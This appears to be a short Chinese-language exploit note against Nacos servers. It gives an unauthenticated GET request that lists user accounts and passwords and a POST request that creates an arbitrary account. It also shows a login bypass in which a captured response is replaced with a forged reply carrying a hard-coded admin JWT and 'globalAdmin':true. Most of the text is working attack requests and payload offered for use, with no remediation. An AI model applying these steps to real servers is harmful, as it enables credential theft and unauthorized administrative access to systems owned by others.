漏洞地址:GET http://IP:端口/nacos/v1/auth/users?pageNo=1&pageSize=9
读取账号密码
任意创建账户
POST http://IP:端口/nacos/v1/auth/users?username=test1&password=test1
抓包将get方式修改为post并重放
账户已被创建
未授权进入后台
输入任意密码bp抓包修改返回包即可绕过进入后台
修改回包内容如下
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}
成功进入后台